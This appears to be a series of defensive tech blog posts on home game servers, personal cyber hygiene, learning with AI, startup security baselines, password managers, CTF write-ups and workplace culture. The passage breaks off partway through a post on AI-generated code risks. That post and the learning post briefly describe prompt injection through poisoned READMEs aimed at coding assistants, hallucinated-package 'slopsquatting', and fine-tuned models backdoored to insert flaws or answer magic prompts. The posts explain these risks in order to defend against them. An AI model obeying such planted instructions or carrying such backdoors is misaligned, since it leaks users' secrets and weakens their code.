playit.gg is purpose-built for game servers; it gives you a public address that proxies into your Pi without you opening a port. Free tier works fine for small groups. Performance hit is minimal; latency adds 5–20 ms depending on the chosen exit node.
Last resort: open 25565 to the internet
Forward TCP/25565 from your router to the Pi. Add a UFW allow rule and lock down the rate at the router if you can:
sudo ufw allow 25565/tcp comment 'minecraft'
Then a Dynamic DNS record (DuckDNS, no-ip, or your registrar’s) so friends have a stable hostname. The risks are real — bots will find you within hours and try Bedrock/Java exploits, dictionary-attack any open ports they can see, and hammer the Pi. If you do this, keep enforce-whitelist=true, online-mode=true, fail2ban running, and never expose 22 to the internet — keep SSH on the LAN/Tailscale only.
Monitoring: Catch Problems Before Players Do
In-game performance: install the Spark plugin. Drop the jar in /opt/minecraft/server/plugins/ and restart. Then in-game or via RCON:
/spark tps
/spark profiler --timeout 30
Pi-level: htop for the eyeball view, vcgencmd measure_temp for thermals, vcgencmd get_throttled to confirm you’re not throttling. If get_throttled returns anything other than 0x0, your cooler or PSU isn’t up to the job.
For a longer-term picture, drop a Prometheus node-exporter on the Pi and scrape it from a Grafana box on your network. For Minecraft itself, minecraft-exporter hooks into Spark and gives you TPS, MSPT, player count, and chunk counts as Prom metrics.
Other Pi 5–Friendly Servers, in Brief
The same shape (dedicated user, systemd unit, NVMe storage, backup script, Tailscale) applies to all of these.
- Terraria via TShock — runs on Mono. 6–10 player worlds are comfortable on a Pi 5.
- PocketMine-MP — Bedrock-edition Minecraft for phones/console players. Lighter than Java; happy on a 4 GB Pi.
- Factorio headless — one of the best-optimised servers around. Works fine on Pi 5 for small (~4-player) games. The official binary is x86_64; you’ll want the ARM64 community build or a
box64wrapper. - Vintage Story — survival sandbox, Mono-based. Light enough for a small group, heavier than Terraria.
Heavy hitters that won’t run usefully on a Pi 5: ARK, 7 Days to Die, Valheim with mods, Project Zomboid with a dozen players. The Pi is a small server, not a magic one.
Final Thought
A Pi 5 game server is peak geek: cheap, quiet, and good enough to run the shared world your group actually plays in. Done right, it doubles as a Linux training lab — you’ll learn systemd, JVM tuning, RCON scripting, backups, networking, and zero-trust ingress, all in one box that costs less than a single AAA game.
Get the cooler. Get the NVMe. Use Tailscale. Whitelist your mates. Back up the world. The rest is just blowing up blocky mountains after work.
![]()
A Starter Guide to Personal Cyber Hygiene (For Non‑Tech People)
You don’t need to be a hacker. You just need better habits.
A Starter Guide to Personal Cyber Hygiene (For Non‑Tech People)
Most people don’t need to become hackers. They just need to stop making life easy for the ones who are. Personal cyber hygiene is the digital equivalent of brushing your teeth: small habits, done regularly, that stop bigger problems later.
Here’s a simple, non‑technical starter guide you can hand to friends, family, or anyone who just wants to be “harder to hack” without learning what a buffer overflow is.
1. Passwords: Stop Reusing the Same One Everywhere
If you only fix one thing, fix this. Reusing the same password on lots of sites is how one small leak turns into your email, shopping, and bank accounts all being at risk.
Do this instead:
- Use a password manager (1Password, Bitwarden, etc.).
- Make your email password strong and unique and never reuse it.
- Don’t keep passwords in plain text notes or on sticky notes stuck to your screen.
2. Turn On Two‑Factor Authentication (2FA / MFA)
2FA means even if someone knows your password, they still need a code from your phone or a key.
Turn it on for:
- Email accounts.
- Banking and financial apps.
- Social media.
- Anything that really matters.
Apps (Google/Microsoft Authenticator, Authy) are better than SMS, but SMS is still better than nothing.
3. Be Careful What You Click (Phishing)
Most attacks on regular people start with a dodgy email, text, or message.
Basic checks:
- Unexpected messages about parcels, bank issues, or account problems: treat them as suspicious by default.
- Check the senders address and where links really go before clicking.
- Never enter your password after clicking a link in an email; type the website address in yourself.
- Be wary of unexpected attachments, especially ZIPs and Office docs asking you to “enable content.”
- If there is a link to the site, dont use it, type the known name into s browser.
If in doubt, don’t click. Ask someone you trust or contact the company using details from their official site.
4. Keep Your Devices Updated
Updates often contain security fixes.
Good habits:
- Turn on automatic updates on phones, tablets, and computers.
- Let your web browser update itself.
- If a device is so old it no longer gets updates, think hard before using it for banking or important accounts.
5. Be Sensible on Wi‑Fi
Public Wi‑Fi is convenient but not always safe.
- Avoid banking or logging into important accounts on public Wi‑Fi if you can.
- Turn off “auto connect” to open networks.
- For sensitive stuff, your mobile data is often safer than a random free hotspot.
At home:
- Use a strong Wi‑Fi password.
- Don’t leave the router on its default password or admin login.
6. Back Up What You Care About
If your only copy of something lives on one device, you don’t really own it.
Simple backup options:
- Cloud backup/sync (for photos and important documents).
- External hard drive you plug in regularly, back up to, then unplug and store safely.
Backups protect you from ransomware, hardware failure, and accidents.
7. Use Basic Protection
You don’t need to become a security pro, but:
- Use built‑in security (Windows Defender, macOS/XProtect, mobile security settings).
- Consider reputable security software if you want extra features.
- Check privacy settings on social media and lock down who can see what.
8. Watch Your Digital Footprint
The more information about you that’s public, the easier it is for scammers.
- Don’t overshare personal details on public profiles.
- Be careful with “fun” quizzes and apps that ask for lots of personal info.
- Occasionally Google yourself and adjust privacy settings if needed.
- Dont post holiday snap whilst youre away
9. Take an Hour a Month for “Digital Housekeeping”
Once a month:
- Check for updates.
- Review your most important accounts and make sure 2FA is still on.
- Clear out apps you don’t use.
- Scan bank and card statements for unfamiliar charges.
Little and often beats trying to fix everything after something bad happens.
10. Don’t Be Afraid to Ask for Help
You don’t have to understand all the jargon to stay safer.
If something feels off, or tries to rush you:
- Pause.
- Ask someone you trust.
- Contact the company via their official website or phone number not via the link you were sent.
Scammers rely on panic and speed. Slowing down is one of the best defences you have.
![]()
Using AI to Learn Without Turning Your Brain to Slop
How to use AI as a tutor, not a copy‑paste vending machine
Using AI to Learn Without Turning Your Brain to Slop
AI can be the best mentor you’ve never had — or the fastest way to become that engineer who pastes things into prod they don’t understand.
Let’s talk about using it to learn skills, not outsource thinking.
AI as a Tutor, Not a Typist
Good uses:
- Ask for conceptual explanations in your own words: “Explain Kubernetes Services as if I’m a network engineer.”
- Ask for comparisons: “Helm vs Kustomize vs plain YAML — when is each a good fit?”
- Ask for step‑by‑step plans: “Build me a 4‑week plan to learn web app hacking with real labs.”
- Use it as a rubber duck on steroids. Explaining a problem clearly enough for an AI to help often surfaces the answer before it even replies — the forced articulation is the value. Pay attention when that happens; that’s your brain doing the actual work.
Then:
- Run the commands yourself.
- Break the lab intentionally.
- Ask follow‑up questions until you can explain it without notes.
Bad use:
- “Give me a complete Terraform module/K8s deployment for X” and shipping it straight to prod without review.
Prompts That Actually Make You Smarter
Steal these. Tweak the topic. Notice the shape — every one of them puts the work back on you.
- The reverse-tutor. “Explain X. Then ask me three questions to check I understood. Don’t give the answers until I try.”
- The Socratic mentor. “I want to learn Kubernetes networking. Ask me questions until you’re confident I understand it. Don’t lecture; just probe.”
- The diff reviewer. “Review this code. Don’t fix anything yet — tell me what’s wrong and why, and let me try the fix.”
- The pair-debugger. “I’ll describe a bug. Ask me what I’ve already tried, what I think the cause is, and what I observed — before suggesting causes.”
- The mock interviewer. “Give me 5 senior-engineer interview questions on JWT security. Mark my answers harshly. Show me what a strong answer looks like only after I’ve answered.”
You’ll notice none of these are “write me X”. That’s the point.
Trust, but Verify
AI confidently makes things up. Non-existent CLI flags, wrong RFC numbers, deprecated APIs, libraries that have never been published. The output is fluent regardless of whether it’s right, and the fluency is the trap — a wrong answer in a confident voice is worse than no answer at all, because it stops you looking further.
Treat the output like a confident-sounding Wikipedia article: useful starting point, never the source of truth.
- Run the command. If it errors, the man page is closer to the truth than the chat window.
- Check version numbers and release dates against the actual project, not the model’s memory.
- For security-relevant code, read the real library docs before pasting.
- For anything you’re going to say out loud in a meeting, find a primary source.
Code, Licences, and Legal Slop
Many models are trained on public code that is:
- Licensed under GPL, MIT, Apache, proprietary, or unknown.
- Vulnerable, outdated, or outright wrong.
Risks:
- You accidentally pull in code that is effectively a derivative work of a GPL project and then drop it into your closed‑source product.
- You copy code containing someone else’s secrets or identifiers.
- You adopt patterns that conflict with your company’s coding standards or policies.
Safer pattern:
- Use AI to explain a pattern, then implement your own version.
- Use it to review your code: “Is there any obvious security issue in this handler?”
- Ask it to translate concepts between languages instead of dumping raw blocks into your repo.
And if your company has legal or OSS counsel: talk to them about policy. Don’t guess.
Security Implications of AI‑Generated Code
Security concerns:
- Insecure defaults. Missing auth, weak crypto, sloppy input validation.
- Hidden assumptions. Relies on global state, works only in trivial examples.
- Prompt injection if you build AI into your product.
- Code-copilot context exfiltration. Copilot, Cursor, and the rest send context to a third party. A poisoned README or comment in a dependency can manipulate suggestions to leak secrets sitting in your buffer or insert subtle backdoors. Audit what your editor sends, where, and check your org’s policy on it.
- Hallucinated package names. AI happily suggests
import requests-helperornpm install fast-yaml-parserfor libraries that don’t exist. Attackers register the typo-squat after watching what AI tends to invent (sometimes called “slopsquatting”). Always verify a package exists on the real registry, with real download counts and a real maintainer, before installing.
Defensive moves:
- Treat AI‑generated code like code from an unknown contributor.
- Run SAST, DAST, and dependency scanning as standard.
- Build a code review culture where reviewers feel comfortable saying “I don’t think you really understand this block; let’s rewrite it.”
Remember: attackers are also using AI — to generate payloads, fuzz inputs, and explore weird corners of your stack faster.
Learning With AI vs Learning From AI
If you want to really learn:
- Use AI to test you, not just teach you: “Give me 5 interview‑style questions about JWT security and then mark my answers.”
- Get it to play “Socratic mentor”: “Ask me questions until you’re confident I understand Kubernetes networking.”
- Iterate: each time you solve something in a lab (THM room, CTF challenge), get AI to help you produce a writeup — then refine it yourself.
Using AI as scaffolding for your own thinking makes you dangerous in the good way. Using it as a copy‑paste vending machine makes you a liability.
Symptoms You’ve Stopped Learning
The early-warning signs are subtle. Catch yourself doing any of these and step away from the chat window for an afternoon.
- You can’t debug your own code without pasting the error in.
- You can’t explain why something in your repo is structured the way it is.
- You ask AI before trying anything yourself — even five-second things you used to do reflexively.
- You copy error messages in verbatim before reading them.
- You can’t write a 200-line program from a blank file without help.
- You feel anxious when the AI is slow or unavailable.
If two or more of those land, you’re not using AI to learn; you’re using it as a prosthetic. Take an afternoon off the tools, fix something hard the slow way, and remember why you got into this.
Final Thought
AI should be the slightly annoying teacher that keeps asking “why?”, not the friend who lets you copy their homework.
If you come out of a session with AI understanding the concept well enough to explain it to someone else, you’ve used it right. If you come out with a blob of code you can’t quite explain… you’ve just added a future incident ticket with your name on it.
For the development side of all this — keeping AI useful in your workflow without losing your security or your soul — see AI-Assisted Development Without Losing Your Soul or Your Security when it lands. For the offence/defence side, Blue Team vs AI Red Team.
![]()
Work-Life Balance in Tech Isn't a Wellness Poster
How to stay sane in startups and still ship
Work-Life Balance in Tech Isn’t a Wellness Poster
Work-life balance in tech isn’t about scented candles and a mindfulness app you never open. It’s about not burning your life down for someone else’s backlog, especially in startups, where the line gets blurred on purpose.
Let’s talk about what balance actually looks like when you’re shipping hard, how to protect yourself, and what a halfway decent leadership team should be doing.
Hustle Culture vs Actually Getting Things Done
Tech and startups love the myth of the heroic 80-hour week. “We’re a family.” “We’re all in this together.” Translation: we didn’t plan properly and you’re going to pay for it with your evenings.
A few awkward truths:
- Burnout is ridiculously common among software engineers and worse in fast-moving environments.
- Long hours past a certain point don’t increase output; they just increase mistakes and attrition.
- Startups with “permanent crunch” often lose their best people just as things get interesting.
Balance is not “never work late.” Balance is “if we push hard for a week, it’s unusual, deliberate, and followed by recovery, its not the default.”
Why Startups Are Uniquely Bad at Balance
Startups are ambiguity machines. Common patterns:
- You wear five hats: infra, security, release engineer, part-time therapist.
- Everything is “critical” because priorities are fuzzy.
- Slack and PagerDuty bleed into evenings, weekends, and holidays because nobody drew a line.
Passion hides overwork. If you care about the mission, it’s easy to normalise 12-hour days. Remote/hybrid blurs home and work until your laptop might as well be grafted onto your hands.
None of this is inevitable. It’s a choice by founders, managers, and sometimes by us when we don’t set boundaries.
What Work-Life Balance Actually Looks Like
Real balance looks like:
- Defined work hours that mean something.
- Protected off-time: no expectation of responding to non-urgent messages at night or on holidays.
- Deep work without constant pings: meeting-free or Slack-light blocks so you can actually think.
- Pacing, not sprinting forever: intense pushes followed by deliberate slowdowns.
Personally, it also means:
- Having non-negotiables outside tech (family, hobbies, sport, whatever).
- Being able to stop thinking about that broken microservice long enough to sleep properly.
How to Protect Yourself Without Torching Your Career
Practical moves:
- Set explicit boundaries and communicate them.
- Guardrails around tools: mute non-critical channels outside work, separate work and personal profiles.
- Say “yes, but”: “Yes, I can jump on this incident, but that means feature X slips, which do you prefer?”
- Use data: track hours and error rates; bring that to your manager if things creep into 60-70 hour territory.
- Know your line: decide what “too far” looks like (permanent weekends, missing important life stuff, health impacts).
If the company normalises that for months, that’s data about the culture, not a reflection on you.
What Good Leaders and Startups Should Be Doing
Healthy leadership:
- Plans realistically and cuts scope instead of casually demanding heroics.
- Models boundaries i.e. not sending non-urgent messages at 11 pm.
- Have clear on-call structure with compensation and recovery time.
- Talks about burnout like it’s real, because it is.
If you’re leading a team: this is part of your job. If you’re not yet, this is what you should expect from the people who are.
Final Thought
The industry loves to talk about “sustainable scaling” for systems. It talks a lot less about sustainable scaling for humans.
Work-life balance isn’t about doing less. It’s about choosing where your energy goes so you can still show up sharp for your team, your users, and your life outside the keyboard. If your current setup makes that impossible, the problem isn’t your resilience. It’s the system you’re in and systems can be changed, or left.
![]()
From ‘We’re Just a Startup’ to ‘We’re a Target’
Building a security baseline before the big clients arrive
From “We’re Just a Startup” to “We’re a Target”
Every founder tells themselves the same story: “We’ll sort security later, once we’ve proved the product.” Then “later” arrives in the form of big‑name clients, vendor questionnaires, and — if you’re unlucky — attackers.
You don’t need a Fortune 500 security budget. You do need a baseline.
The Things You Should Never Have Skipped
Some controls should exist from day zero:
- Identity and access management basics: unique accounts, MFA everywhere, no shared “admin” logins.
- Secrets management: no API keys in
.envfiles committed to Git; use a proper secrets store. - Environment separation: clear dev/test/prod boundaries, with restricted access to prod.
- Logging: centralised logs for infra and apps, retained long enough to investigate incidents.
If you’re moving from scrappy startup to “we have serious clients now,” you need to check:
- Are backups tested and restorable?
- Do you have at least a basic incident response plan (who does what, when)?
- Do you know your data flows and where customer data actually lives?
What Becomes Non‑Negotiable as You Grow
Once you’re holding sensitive data for large clients, the must‑haves look like:
- Formal access control (RBAC) across cloud, K8s, CI/CD, and SaaS; no “everyone is Owner on the project” nonsense.
- Strong endpoint security for staff laptops (disk encryption, EDR, patching).
- Vendor risk management: don’t shove your data into random SaaS without understanding how they secure it.
- Vulnerability management: regular scanning plus a way to triage and remediate, not just create tickets that rot.
For many B2B contracts you’ll be asked about:
- SOC 2 / ISO 27001 alignment, or at least controls inspired by them.
- Data residency and retention policies.
- How you handle security incidents and notify customers.
You don’t need a certificate on day one, but you do need credible answers.
Security by Phase, Not by Panic
Think in phases:
Seed / Early:
- Harden IAM, MFA, secrets, backups.
- Get basic logging and alerting in place.
- Document minimal policies (acceptable use, access control).
Series A:
- Formalise RBAC, separate duties in prod vs dev.
- Introduce security reviews for major features.
- Start threat modelling your core architecture.
Post‑Enterprise Logo:
- Dedicated security owner (if not a team).
- Regular third‑party tests (pentests, cloud config reviews).
- Clear change management around risky systems.
Security that grows with you beats security you panic‑buy after the first breach.
A One-Page Baseline Checklist (Stick This in a Doc)
Steal this. Adjust the owners. Tick or red-flag every line. If a row stays red for more than a quarter, it’s a backlog item that’s earned the right to a real conversation about scope vs scale.
# Startup Security Baseline — last reviewed: ____
## Identity & access
- [ ] SSO (Google / Okta / Entra) for every SaaS that supports it
- [ ] MFA mandatory on email, Git, cloud console, and IdP
- [ ] No shared "admin" logins; per-human accounts only
- [ ] Joiner/leaver checklist with same-day SaaS deprovisioning
- [ ] Break-glass admin account documented + tested quarterly
## Code & secrets
- [ ] No secrets in repos (gitleaks pre-commit + CI scan)
- [ ] Secrets stored in Vault / cloud secret manager (not .env)
- [ ] Per-env secrets separation (no prod creds in dev)
- [ ] Dependency scanning on every PR (Snyk / Trivy / Dependabot)
- [ ] SAST on every PR (Semgrep / GitHub Advanced Security)
## Cloud & infra
- [ ] IaC for everything that matters (Terraform / Pulumi)
- [ ] Cloud config monitoring (Security Hub / Defender for Cloud / SCC)
- [ ] No public S3/Blob/GCS unless explicit, reviewed, and tagged
- [ ] Production access via SSO + JIT (no standing admin)
- [ ] CloudTrail / Audit Logs / Activity Logs centralised + retained
## Endpoints
- [ ] Disk encryption (FileVault / BitLocker) on every laptop
- [ ] EDR / antivirus running, signatures fresh
- [ ] OS patch SLA (e.g. 14 days for high CVEs)
- [ ] MDM enrolled (Intune / Jamf / Kandji)
- [ ] Lock screen, password manager use, screen-share hygiene baked in
## Data
- [ ] Customer data classified (where it lives, who can see it)
- [ ] Encryption at rest + in transit, no exceptions
- [ ] Backups exist, are tested, and stored off the production account
- [ ] Data retention + deletion policy written and enforced
- [ ] DSAR / right-to-be-forgotten process documented
## Process
- [ ] Documented IR plan with on-call rotation
- [ ] Vendor risk: every third-party tool reviewed before onboarding
- [ ] Acceptable Use Policy + AI usage policy signed at hire
- [ ] Annual security awareness training (real, not slideware)
- [ ] At least one pentest in the last 12 months
This is roughly the SOC 2 / ISO 27001 starter scope mapped to engineering reality. Most B2B questionnaires from sensible buyers boil down to “show me you can answer most of these confidently”. You don’t need certificates on day one; you need to be able to walk a serious customer through this list without inventing things.
For the cloud-side deepening, see Building a Cloud Security Baseline: From S3 Buckets to CNAPP. For the architecture this lives inside, Zero Trust Architecture: A Deep Practical Walkthrough.
Final Thought
If you’re already signing big clients, congratulations: you’re now interesting to people you’d rather weren’t interested in you.
You can’t retroactively secure year one, but you can stop pretending that “we’re just a startup” is still a valid excuse. Draw a line, build a baseline, and make “we take security seriously” something you can demonstrate — not just say.
![]()
Password Managers: The Least Exciting Tool That Will Absolutely Save You
Stop playing password roulette with your life
Password Managers: The Least Exciting Tool That Will Absolutely Save You
Passwords are still everywhere, still terrible, and still the root cause of a ridiculous number of breaches. A password manager is the boring, unsexy solution that quietly fixes most of this.
Let’s talk about why you should be using one, how to choose it, and what can still go wrong.
Why Password Managers Matter
Without a manager, humans:
- Reuse passwords across multiple sites.
- Use predictable patterns (“Summer2026!”, “CompanyName123”).
- Struggle to rotate credentials when breached.
A good password manager:
- Generates long, random, unique passwords per site.
- Stores them encrypted behind a single strong master passphrase (and ideally a hardware key).
- Syncs across devices so you’re not tempted to text yourself passwords or store them in notes apps.
For attackers, password reuse is a goldmine. For defenders, stopping reuse is one of the highest‑ROI moves you can make.
What Makes a Good Password Manager?
Look for:
- End‑to‑end encryption with audited, documented cryptography.
- Zero‑knowledge architecture (provider can’t see your vault contents).
- Support for FIDO2/WebAuthn and TOTP, so you can centralise MFA management.
- Open‑source clients or at least strong independent audits.
For organisations:
- Enterprise features: role‑based sharing, provisioning/de‑provisioning, audit logs.
- Group vaults for shared infrastructure creds that cannot live in Slack or Confluence.
But Aren’t Password Managers a Big Single Point of Failure?
Yes — which is why you:
- Use a strong, unique master passphrase, not a password.
- Turn on hardware‑backed 2FA (security keys) wherever possible.
- Keep an offline recovery method for emergencies (printed recovery key in a safe, etc.).
The practical risk trade‑off:
- One well‑protected vault vs dozens or hundreds of weak, reused passwords scattered everywhere.
- When a site is breached, you only rotate one credential, not 20.
We have enough real single points of failure (S3 buckets, CI tokens, admin panels). This is one you can manage.
Common Failure Modes and How to Avoid Them
Things that still go wrong:
- Users disable autofill and copy‑paste into phishing sites that look identical.
- Shared accounts are handed around outside the manager “because it’s quicker.”
- Admins keep master credentials in plain text somewhere “just in case.”
Mitigations:
- Pair password managers with phishing‑resistant auth (FIDO2).
- Educate: teach people to look for the browser extension’s “this is a saved site” signal rather than the URL bar alone.
- Make the password manager the easiest path, not the compliance burden.
Final Thought
Password managers won’t make you invincible. They will, however, move you from “trivially compromised by the first breach” to “attacker has to actually work for it.”
If you only implement one security habit this month, make it this one: pick a manager, move your email, bank, and socials into it, and retire your mental list of three recycled passwords for good.
How To Write a CTF Writeup That’s Actually Worth Reading
And why this skill makes you a better security professional
How To Write a CTF Writeup That’s Actually Worth Reading
You’ve rooted the box, grabbed the flag, and you’re buzzing. The temptation is to slam the “completed” button and move on. But how you document what just happened matters more than most people realise.
Good writeups aren’t flex pieces. They’re tools, for your future self, for the community, and for your career.
Why Bother Writing It Up?
A solid writeup helps you:
- Cement knowledge: explaining an attack chain in your own words makes it stick.
- Build a portfolio: great for roles in pentesting, detection engineering, AppSec, or DFIR.
- Contribute to the community: other learners stand on your shoulders the way you stood on someone else’s.
And, crucially, it trains you to tell a story. Incident reports, post‑mortems, and bug bounty submissions are all just more formal, higher‑stakes versions of CTF writeups.
Structure: Tell the Story, Don’t Dump Commands
A good template: CSV · PDF · Word
-
Overview
Target, platform (THM, HTB, CTF name), category (web, pwn, forensics, etc.), difficulty. -
Recon
Scans, enumeration, key findings, why they mattered. -
Initial Access
Vulnerability identified, exploitation steps, payloads, screenshots where useful. -
Privilege Escalation / Lateral Movement
Misconfigurations, creds reuse, kernel or app exploits, persistence. -
Flag / Objective
How you finally got what you needed. -
Lessons Learned
What you’d do faster next time, tools that helped, patterns you recognised.
The goal isn’t to show every keystroke. It’s to show decision‑making: “I saw X, so I tried Y, because I expected Z.”
Write for Future You (and the Reviewer)
You’re not just writing for internet strangers. You’re writing for:
- Future you, six months from now, staring at a weird web app thinking “I swear I’ve seen this before.”
- Recruiters or hiring managers scanning your blog or GitHub.
- Bug bounty triage teams deciding whether your report is solid or hand‑wavy.
So:
- Use headings and a consistent format across all writeups.
- Include command snippets, but also include the reasoning.
- Highlight dead‑ends briefly: “Tried X, didn’t work because Y”that’s great signaling.
Screenshots, Code, and Ethics
Screenshots are great, but:
- Blur usernames, IPs, or anything sensitive on hosted platforms.
- If reproducing a commercial platform’s room, check their rules on spoilers and timing. Some require a delay before posting.
Code blocks:
- Show key payloads and scripts, but don’t paste entire walls of log output.
- Comment non‑obvious parts so someone else can adapt them.
And if you’re documenting a live bug bounty or engagement:
- Get permission if it’s a client.
- Redact domains and IPs or mask them, unless the program explicitly allows full public detail.
From CTF Writeups to Professional Reporting
The same muscles you’re building here feed directly into:
- Bug bounty reports with clear impact, reproduction, and remediation.
- Internal vuln reports your developers will actually respect.
- Detection engineering docs explaining attacker behaviour and required SIEM rules.
Good security people don’t just find things. They explain them so others can act.
If your THM/CTF writeups train you to explain clearly, you’re already ahead of most of the field.
Final Thought
Treat every CTF or THM room as a free training engagement with one extra step: write the report. Do that consistently and you’ll end up with a knowledge base, a portfolio, and a reputation for being the person who not only pops shells, but makes sense of them.
![]()
Culture Isn’t about a Ping‑Pong Table. It’s What Happens When Nobody’s Looking.
On values, difficult people, and how fast growth can rot a good company
Culture Isn’t about a Ping‑Pong Table. It’s What Happens When Nobody’s Looking.
Every startup’s website claims they value “integrity, innovation, and people.” What actually matters is what happens when a loud, political high‑performer starts trampling the quieter people who keep everything working.
This is about values, difficult people, and how fast growth can quietly kill the thing that made a company special in the first place.
What Values Actually Are (Spoiler: Not the Slide Deck)
Values are not the pretty words on the About page. Values are the trade‑offs leadership makes when it hurts.
They show up when:
- A deal is on the line and someone suggests “we could cut the security review.”
- A senior engineer misbehaves but “delivers so much value.”
- Credit for a project mysteriously gravitates to the person shouting loudest in Slack.
A company that genuinely values people:
- Protects the ones who quietly deliver.
- Deals with bullying and exploitation even when it’s inconvenient.
- Makes decisions that match what they claim publicly.
The second you let someone stay because “they’re too important to lose,” you’ve declared your real values. Everyone sees it. They might not say anything, but they adjust accordingly.
The Difficult Person Archetype (You Already Know Them)
There’s always one:
- Charming upwards, corrosive sideways, horrible downwards.
- Excellent at narratives: “I did this,” “my idea,” “my initiative.”
- Good at spotting the people who’ll take extra work, not complain, and never fight for credit.
In rapidly growing startups these people thrive because:
- Visibility often matters more than substance.
- Leadership is busy with investors, clients, and roadmaps.
- HR is often under‑powered, under‑funded, or non‑existent.
You end up promoting the person who looks like a “natural leader” because they “own the room,” while the person who built half the platform is still labelled “not strategic yet.”
The Quiet Talent Tax
The people who get exploited here are often:
- The best engineers.
- The ones mentoring juniors.
- The people writing the docs, fixing the pager rotations, tidying up security debt.
They:
- Take on extra responsibilities.
- Shield others from chaos.
- Rarely shout about their achievements.
Then they burn out, feel taken for granted, and leave. Quietly. No LinkedIn rant, no big drama. They just go. And suddenly:
- Incidents take longer to fix.
- Onboarding feels harder.
- The vibe changes.
You can’t A/B test culture, but when enough of these people walk, the whole place feels different.
Holding the Difficult Ones to Account
This is where leadership either earns their salary or proves they’re just along for the funding ride.
Good leaders:
- Don’t excuse bad behaviour with “but they deliver.”
- Have uncomfortable conversations early, before patterns calcify.
- Make it clear that how you achieve results matters as much as what you achieve.
Practical things that actually help:
- 360 feedback with teeth: anonymous input that can’t just be hand‑waved away.
- Explicit behavioural expectations: not just “hit your KPIs” but “don’t destroy your team getting there.”
- Regular skip‑level chats where ICs can talk directly to leadership about dynamics.
If you’re leading a team and you can already name the person doing the damage, you’re also choosing, actively or passively, whether to let it continue.
Culture Under Load: Startups That Grow vs Startups That Rot
Scaling from 10 to 100 to 200 people is not just “more of the same.” It’s structurally different work.
Startups that keep their soul tend to:
- Hire for values as hard as for skill. A brilliant engineer who undermines everyone is a net negative.
- Invest in people ops before the pain becomes existential, HR as a strategic partner, not just admin.
- Promote the culture carriers: the ones who collaborate, mentor, and share context.
- Exit the wrong people, quickly and cleanly, regardless of their title.
The ones that rot:
- Tolerate politics as “just how it is.”
- Let founders drift away from the day‑to‑day until nobody is really stewarding the culture.
- Use growth as an excuse for every bad behaviour.
Culture isn’t what you say you are. It’s what you tolerate.
Final Thought
If you’re a “nice” person being quietly leaned on, taken advantage of, or erased, the problem isn’t you. But you do have choices: document, set boundaries, and, if necessary, walk. The places that deserve you are out there.
And if you’re in leadership: your values are the sum of your hardest decisions. Make them count.
![]()
The AI Gold Rush Is Making the Internet Worse — And Could Get You Hacked
AI slop, backdoors, and the data leakage nobody wants to talk about
The AI Gold Rush Is Making the Internet Worse — And Could Get You Hacked
AI is everywhere, and a depressing amount of it is mediocre, insecure, or both. The industry is sprinting to bolt “AI-powered” onto everything while quietly ignoring the attack surface it’s creating. The board sees velocity, the engineers see whichever bit of the iceberg is in their lane, and nobody is looking at the whole shape of what’s coming on board.
Let’s talk about the mess: AI slop, packaged-up vulnerabilities, poisoned models, and the way your own staff are leaking your crown jewels into someone else’s GPU cluster without meaning to. With names of actual tools, actual incidents, and actual things you can do today.
What AI Slop Actually Looks Like in Your Repo
AI slop is all the confident rubbish we’re drowning in: code, blog posts, docs, and “advice” generated and deployed without anyone actually understanding it. The dangerous bit isn’t that AI can be wrong — it’s that it’s wrong in ways that look professional. The patterns I keep seeing in real codebases:
- A junior asks an assistant how to verify JWTs, gets an answer based on some 2021 StackOverflow thread, and copies it in. No
audcheck. Nokidvalidation.verify(token, secret)with the algorithm pulled from the token header itself — the textbookalg: nonebypass that has been documented since 2015 and that AI assistants still happily produce. - A “secure file upload with Node and Express” prompt yields code with no size limit, no content-type validation, files written straight to a web-reachable directory. Looks senior. Slides through review. It’s an arbitrary file upload bug waiting for a
.phpto land. - Crypto helpers that use
crypto.randomBytes(16)for a salt butMath.random()for the IV. Nobody notices because the function works. - Tests that mock the very thing the code is supposed to verify (the AI signs the test in a way that always passes).
Confident wrongness at scale is dangerous. When the wrongness is in your auth, crypto, or input handling, it’s not just embarrassing, it’s exploitable. And it’s not theoretical — Stanford CRFM and other groups have repeatedly published studies showing that developers using AI assistants ship code with measurably more security vulnerabilities while feeling more confident about its quality.
What you can actually do, today:
- Run Semgrep with the
r2c-ciandgitleaksrule packs in CI on every PR. Cheap, fast, catches a chunk of slop including hardcoded secrets and the JWT-style anti-patterns. - Add a
r2c.dev/ai-generatedsignal — most editors can be configured to mark AI-suggested blocks; flag them for stricter review. - Use Snyk Code or GitHub Advanced Security for SAST that understands AI-style insecure patterns specifically; their rule sets get updated faster than hand-rolled regexes.
- Re-read the OWASP LLM Top 10 once a quarter. It updates and the quiet additions are the ones worth knowing.
When Your Coding Assistant Hallucinates Whole Packages
Slopsquatting is the 2025-onwards evolution of typosquatting. Researchers at Lasso Security, Vulcan, and others showed that the major code assistants invent package names with surprising regularity — huggingface-cli instead of huggingface_hub, node-cache-fast instead of node-cache, plausible-but-fictional names that look right and even compile in trivial test scripts. Attackers register the invented names after observing what the AI tends to make up, push a malicious package, and wait.
The proof points are out there: research published through 2024–2025 documented thousands of hallucinated package names across npm, PyPI, and crates.io, with reproducibility rates high enough that adversaries treat it as a discovery channel. The first wave of malicious slopsquatted packages started appearing in late 2024.
What you can do:
- Pre-install allowlists in CI — packages must exist in your internal mirror (Artifactory, Nexus, GitHub Packages, Verdaccio) before they can be installed. Outbound to public registries is blocked from build runners.
- Lockfile-only installs (
npm ci,pip install -r requirements.txt --require-hashes,cargo build --frozen) — if it’s not in the lockfile, the build fails. - Tools like Socket or Phylum that flag packages with low download counts, no maintainer history, or dependency signals that don’t match a legitimate library.
- Manual verification: before adding any AI-suggested package, check the registry for download count, maintainer, age, and source repo. Most invented names have <1k weekly downloads and a
descriptionfield that reads like an LLM wrote it.
Backdoors, Poisoned Models, and the Supply Chain Nightmare
The XZ backdoor (CVE-2024-3094) showed what one patient malicious maintainer can do to a critical dependency over years. Now add AI to that equation: an attacker can generate thousands of plausible-looking package variants, write convincing READMEs and commit histories, and seed them across npm/PyPI/crates.io faster than any review queue can keep up.
On the model side, the same supply-chain logic applies, with extra teeth:
- A “fine-tuned security helper model” pulled from Hugging Face because it promises great exploit detection. It’s been fine-tuned to inject specific backdoor patterns into generated code, “forget” certain checks, or respond to magic prompts in ways that leak training data.
- The infamous PyTorch nightly compromise of December 2022 (a malicious dependency in the nightly build pipeline) showed the ML toolchain isn’t immune.
- “Pickle” model formats can execute arbitrary code on load —
.pkland.pthfiles are not just data, they’re scripts. Anyone deserialising untrusted pickles is one bad file away from RCE.
Treat models like the production-grade dependencies they are:
- Pin versions and hashes. Hugging Face supports revision-pinning by commit SHA:
from_pretrained(name, revision="<sha>"). Use it. - Prefer
